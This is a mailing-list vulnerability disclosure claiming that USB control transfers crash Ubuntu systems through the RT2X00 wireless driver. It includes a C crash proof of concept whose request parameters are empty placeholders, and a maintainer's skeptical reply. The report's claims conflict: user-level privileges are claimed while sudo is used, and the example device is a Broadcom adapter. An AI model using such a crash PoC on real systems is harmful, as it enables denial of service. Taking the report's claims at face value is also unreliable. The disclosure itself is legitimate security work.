Reproduction conditions for this vulnerability:

Target version: Ubuntu 22.04 & 24.04.

Load the wireless network card using the RT2X00 driver into the target system. Use the lsusb command to view the ID and PID. For example:

Bus 001 Device 008: ID 0a5c:bd17 Broadcom Corp. BCM43236 802.11abgn Wireless Adapter

Replace dev = usb.core.find(idVendor=0x0a5c, idProduct=0xbd17) in the general script with the ID numbers of your own PC machine.

Execute: sudo python3 poc.py and wait quietly; the system will crash directly.

Note: pyusb library: PyUSB provides Python 3 with easy access to host Universal Serial Bus (USB) systems. This library is very safe. https://github.com/pyusb/pyusb or pip install pyusb.

I am submitting a C language POC to you, but I believe it is not as stable as the Python version. You can give it a try.

poc.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <libusb-1.0/libusb.h>

#define VENDOR_ID 0x148f
#define PRODUCT_ID 0x3070
#define DATA_SIZE 64

// Define your requests here (example)
struct usb_request {
    uint8_t bmRequestType;
    uint8_t bRequest;
    uint16_t wValue;
    uint16_t wIndex;
    uint16_t data_length; // You may need to adjust this based on your actual requests
};

struct usb_request requests[] = {
    { /* fill with your request parameters */ },
    { /* fill with your request parameters */ },
    // Add more requests as needed
};

int main(void) {
    libusb_device_handle *dev_handle;
    int r;

    // Initialize libusb
    r = libusb_init(NULL);
    if (r < 0) {
        fprintf(stderr, "Error initializing libusb: %s\n", libusb_error_name(r));
        return 1;
    }

    // Open device
    dev_handle = libusb_open_device_with_vid_pid(NULL, VENDOR_ID, PRODUCT_ID);
    if (dev_handle == NULL) {
        fprintf(stderr, "Device not found or could not be opened.\n");
        libusb_exit(NULL);
        return 1;
    }

    // Run specified requests
    int i;
    size_t j;
    for (i = 0; i < 100; i++) {
        for (j = 0; j < sizeof(requests) / sizeof(requests[0]); j++) {
            struct usb_request *req = &requests[j];
            unsigned char data[DATA_SIZE];

            // data_length must not exceed the buffer handed to libusb
            if (req->data_length > DATA_SIZE) {
                fprintf(stderr, "Request %zu: data_length %u exceeds DATA_SIZE\n",
                        j, (unsigned)req->data_length);
                continue;
            }

            memset(data, 0xFF, DATA_SIZE);
            r = libusb_control_transfer(dev_handle, req->bmRequestType, req->bRequest,
                                        req->wValue, req->wIndex, data,
                                        req->data_length, 0);
            if (r < 0) {
                fprintf(stderr, "Control transfer failed: %s\n", libusb_error_name(r));
            }
            usleep(100000); // Sleep for 0.1 seconds between requests
        }
        libusb_reset_device(dev_handle); // Reset the device after each pass over the request list
    }

    libusb_close(dev_handle);
    libusb_exit(NULL);
    return 0;
}

gcc -o usbpoc poc.c -lusb-1.0
sudo ./usbpoc

Kalle Valo <kvalo@xxxxxxxxxx> wrote on Sat, Aug 3, 2024 at 05:03:
>
> Mark Esler <mark.esler@xxxxxxxxxxxxx> wrote:
>
> > On Fri, Aug 02, 2024 at 03:57:47 PM +0800, color Ice wrote:
> >> Dear RT2X00 driver maintainers,
> >>
> >> We have found a serious vulnerability in the RT2X00 driver. We
> >> recommend urgently submitting an update.
> >>
> >> *Vulnerability description*: When the PC is running Ubuntu 22.04 or 24.04,
> >> executing our proof of concept (POC) can directly cause a null pointer
> >> dereference or a use-after-free (UAF). The systems we tested are:
> >>
> >> - *Description*: Ubuntu 22.04.4 LTS *Release*: 22.04
> >> - *Description*: Ubuntu 24.04 LTS *Release*: 24.04
> >>
> >> We tested network cards of the RT2870/RT3070/RT5370 series, all of which
> >> belong to the RT2X00 driver group, and all of them can trigger the
> >> vulnerability. Furthermore, executing the POC only requires user-level
> >> privileges. Debian systems are not affected.
> >
> > It is currently unclear whether Ubuntu is the only affected distribution.
>
> Since there is no description of the problem, it is also unclear how this
> works. I will not run any scripts, and I don't know how the python
> usb.core package works. I guess it needs root privileges to send these USB
> commands? If this really is a security vulnerability, here are the
> instructions on how to report them:
>
> https://docs.kernel.org/process/security-bugs.html
>
> Also adding Greg.
>
> --
> https://patchwork.kernel.org/project/linux-wireless/list/
> https://wireless.wiki.kernel.org/en/developers/documentation/submittingpatches